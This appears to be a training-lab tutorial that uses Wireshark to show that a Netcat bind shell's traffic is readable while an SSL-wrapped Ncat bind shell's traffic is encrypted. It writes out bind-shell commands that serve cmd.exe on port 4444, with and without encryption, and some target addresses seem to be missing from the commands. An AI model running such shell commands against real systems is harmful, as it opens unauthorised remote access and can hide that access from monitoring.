Free MP3 Music Header Free MP3 Music Header Free MP3 Music Header
Chrome Strip
Chrome Strip


Let's look at 2 examples, unencrypted Netcat and encrypted Ncat bind shells using Wireshark.

NOTE: if you get the "Lua error during loading"

set lua error disable = true in the init.lua file:

First we start Wireshark on the Kali machine and choose to capture Traffic from the Lab VPN interface - this is tap0 in this example.

CAPTURE --> OPTIONS --> select tap0

To help filter out unwanted traffic, we will set a capture, filtering wireshark.

When selecting the interfaces we can apply filters on the same screen at the bottom. We want to capture traffic to and from the windows 7 lab machine on tcp port 4444.

The syntax for this will be:
****CAPTURE FILTER: host and tcp port 4444

Now we recreate the Bind Shell scenario

The Listener provides a shell to connect to in a Bind Shell. In this case the listener is setup on Windows to provide a windows shell upon connection.
C:\>nc -lvp 4444 -e cmd.exe

We then connect to this using Kali.
#nc -nv 4444

When we go back and follow the TCP stream for the captured traffic, we see that all commands sent and readily visible.

Lets now try the same with an encrypted Ncat Shell.

First we need to reset the capture in Wireshark.

On the Windows machine we will now setup the encrypted Ncat listening, providing a windows shell upon connection - this is a bind shell.
C:\>ncat -lvp 4444 -e cmd.exe --ssl

On the Kali machine we will use Ncat to connect securely.
#ncat -nv 4444 --ssl

This time when we look at the traffic, it is encrypted and unable to be deciphered.